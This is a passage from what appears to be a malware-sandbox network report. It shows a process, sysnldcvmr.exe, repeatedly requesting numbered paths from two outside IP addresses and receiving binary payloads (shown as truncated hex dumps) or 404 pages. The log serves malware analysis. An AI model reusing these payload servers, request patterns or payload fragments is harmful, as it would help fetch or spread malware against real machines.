Dec 5, 2024 17:33:46.396986008 CET	1236	IN	Data Raw: 73 3f c8 70 a0 b1 a5 99 ee 13 69 d1 fa 12 73 bb ba 00 95 62 62 eb 4d 88 09 c5 cd df 9e bb eb 46 1a 12 02 08 16 76 51 53 45 40 15 d9 9e d5 6c 9f 07 3d ef 29 16 30 78 22 a5 fa 2e 9a 81 17 cb 93 ef 9b c3 87 ab f8 1a 0e 2f 3c ad 0a 1f 78 26 9f 2b a0 Data Ascii: s?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9(7~GF3fx@fxR6;T4 P-.!HAGl'D7vRo"_x\|zi,XBj->[yoXo.!t:4\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.11	50031	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:48.510323048 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:33:49.902345896 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:49 GMT Content-Type: application/octet-stream Content-Length: 66816 Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT Connection: keep-alive ETag: "6751d253-10500" Accept-Ranges: bytes Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED] Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA\|?g}o k?Z5nD8E%\|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b\|S,Z?9C&]:jE>90F]qj(>rXn{v^e
Dec 5, 2024 17:33:49.902363062 CET	1236	IN	Data Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr3G<d4LV$@M<_dT\|,g+U[zh^PI_wQvVs\|nXaGIr30pZYz]>
Dec 5, 2024 17:33:49.902373075 CET	1236	IN	Data Raw: a9 48 83 d2 10 f4 b5 8a 35 25 2e 77 45 f8 5d 3f 91 e1 2b a7 1a ab 43 6e ba f5 88 8a b7 01 06 21 4e 06 67 b5 98 56 96 0b 75 8b 11 70 97 42 33 77 ee 76 44 11 f4 b7 76 6b b7 15 ef 25 c1 80 a8 eb 2a ae 34 6f d4 65 d7 ff 02 e9 4b b4 7d 78 99 87 5f 14 Data Ascii: H5%.wE]?+Cn!NgVupB3wvDvk%*4oeK}x_UzOqUR3<mi659wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-
Dec 5, 2024 17:33:49.902386904 CET	1236	IN	Data Raw: 08 e2 42 7b 64 54 85 29 7e 35 15 93 c2 d3 c8 02 11 06 ed 8f 60 73 21 07 d0 5a 5b 39 e8 df 93 eb 85 4a 10 b4 32 a3 0e a6 31 81 7e da 45 d1 93 37 a8 3d b3 9a ef 2b 82 34 4c a8 67 bf c1 ed 20 df fb 7a 8c 4f 36 3b f3 43 fd 01 d7 3b da 75 3d 17 4e 03 Data Ascii: B{dT)~5`s!Z[9J21~E7=+4Lg zO6;C;u=NaXc/q\|"I&DF0<=aAlVvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1
Dec 5, 2024 17:33:49.902494907 CET	1236	IN	Data Raw: 00 48 c6 4e d1 e6 8b 16 03 63 01 1e 1d 35 f0 a3 13 6d d4 42 50 24 54 97 af c1 86 92 4d dc 45 ee 1c dd 3f 98 54 8b c9 b0 00 61 92 15 12 b7 8f a2 b2 f8 6d 01 1e 74 6e fc 4c 73 b0 2a 72 28 b5 ba a0 d0 11 1a 0b 59 1c 0a 4e 7e a5 c9 f8 49 2a 87 fb e4 Data Ascii: HNc5mBP$TME?TamtnLsr(YN~I$>f-~4~E97#m+m32K1VW[u[LdTqwSO(@0i[3ZUZg+o6E"Z[oxd31oH"#$%7H_
Dec 5, 2024 17:33:49.902506113 CET	1236	IN	Data Raw: f7 ed 6c e6 2b 92 fb d5 d9 48 48 81 54 83 0c 26 13 f7 a5 8a fc 0e 4b 99 a8 a1 ac b7 45 18 0a c0 e8 fe 5a 95 8a a1 44 9b 71 2a 59 74 32 83 e3 1d e3 6a 92 82 01 7d 2c c6 5b bf 85 7b aa c1 56 51 73 ef e3 00 f9 80 fa e0 98 27 f8 0f dd 7e 80 23 d5 53 Data Ascii: l+HHT&KEZDq*Yt2j},[{VQs'~#Sat>A?O.<3~.Y8Xos_w'kioyg<^ FTAI93\|tKRN2 &<R]G{\|lL?Mg;~Idz7?:`X
Dec 5, 2024 17:33:49.902515888 CET	1236	IN	Data Raw: e4 d9 48 33 cc 3d 1b b8 84 7c 7d e1 4f 43 c2 70 8c 0b fd 96 2d c4 be 29 a5 30 d7 0c f5 c5 46 e2 d6 dc 01 b6 85 96 59 d1 1f b1 31 e4 8e 7e 84 20 00 68 f7 c1 f6 6d ac d2 10 98 42 d8 96 5c d4 3d 22 2b 98 0f f5 09 df 98 9b 76 cb a7 0d 9e d0 d4 90 b7 Data Ascii: H3=\|}OCp-)0FY1~ hmB\="+v_:Jh2i5=QwsyMlrBJdj9j&,}dUe>)hx:P]T4\|etM')[f7&,7vd_Z!)"Ulb\S*5Kk}l
Dec 5, 2024 17:33:49.902529955 CET	1236	IN	Data Raw: 09 7d 50 fe 2e a6 8d bc 67 5c c1 78 de 53 d2 be 19 21 38 21 b5 8d 60 93 df bd 7e 5e f5 11 47 09 4d 50 a4 df a8 af f0 62 d7 37 db 1c f7 44 db ac 1b 6c a6 08 74 a7 4c 7e 62 41 14 37 81 f5 08 18 2a 55 f2 93 27 fb 7c aa a5 4e de 31 a7 a2 4d 78 5f 06 Data Ascii: }P.g\xS!8!`~^GMPb7DltL~bA7U'\|N1Mx_'^em'-i AeG: bSrK;\|j!a.v!I9\|Q#4'vZc"_2NI?~NwDa"A%i&T!51py:=(lTzl
Dec 5, 2024 17:33:49.902605057 CET	1236	IN	Data Raw: 34 64 0d fc f6 7d fc dc 47 24 4f 66 80 41 d1 d5 37 59 6d 4a 44 0b a4 f4 eb 61 2b 94 a3 a3 24 a7 3e 38 ef fe bf da 99 04 51 4f 6f 5f 25 92 4e fb 8c 7e 75 48 e3 65 87 05 78 d4 d9 2f 0e 6e 7d 4d fb 58 c6 7e 80 b9 3f 4a ca 6b 21 5b f4 19 0e 11 44 7f Data Ascii: 4d}G$OfA7YmJDa+$>8QOo_%N~uHex/n}MX~?Jk![DA Yc_zmE_9*ay~}'t:8J5FDb]:1J79q)xx3R#I+l_xx6J)c^E2BB;C^n(W<Mp
Dec 5, 2024 17:33:49.902676105 CET	1236	IN	Data Raw: 89 8a cb e6 fe f3 e4 57 5f c5 58 2e fe 5a 83 32 3c e9 62 58 f5 81 62 4f 2b b1 28 00 ce 93 76 b2 3e 45 fb a2 aa ad 90 7f b9 2e a2 a5 20 44 7e b8 13 15 9d 27 08 25 0a ec 79 36 34 2e 01 15 1d 70 a3 25 50 53 fd 5a 80 4e e1 7a a0 2e c9 ca a7 bc b6 3f Data Ascii: W_X.Z2<bXbO+(v>E. D~'%y64.p%PSZNz.?KS?s)41=5;k],SuYe+`KO5J_ra3"Tz?/"(x9<4M{mU{DZs?)1h2?k3Z<h
Dec 5, 2024 17:33:50.022286892 CET	1236	IN	Data Raw: 1b 54 54 0c a5 35 62 04 25 17 fb a1 5a c1 20 4e 9e f5 1a a9 dc 9e 69 2a 6d f3 3c 60 8c 8c 66 ce 7b 19 74 86 28 6f 53 21 79 da 1e cf 5e 12 bd ec 5a 9c bd 51 fb 2c cd f4 0c 1c ef e8 e8 84 4c 17 1c f3 dc 0e 11 43 b4 8b 87 90 b9 33 0a f5 81 1b b5 da Data Ascii: TT5b%Z Nim<`f{t(oS!y^ZQ,LC3=aZLTGa3U@>=j%$W#~{z"I\|r=Hp2@YDiVa$9(i9}MDD2~5k^ACeHCG+]"GB9s}Ozt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.11	50033	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:53.301632881 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:54.656107903 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:54 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.11	50035	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:33:56.878448009 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:33:58.211829901 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:33:57 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.11	50036	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:00.588324070 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:01.913131952 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:01 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.11	50038	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:04.533500910 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:05.859986067 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:05 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.11	50041	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:08.755938053 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:10.077678919 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:09 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.11	50043	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:14.207685947 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:15.521878004 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:15 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:34:15.521895885 CET	124	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r
Dec 5, 2024 17:34:15.524365902 CET	1236	IN	Data Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
Dec 5, 2024 17:34:15.524439096 CET	1236	IN	Data Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1 Data Ascii: `3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'\|:.o85>$
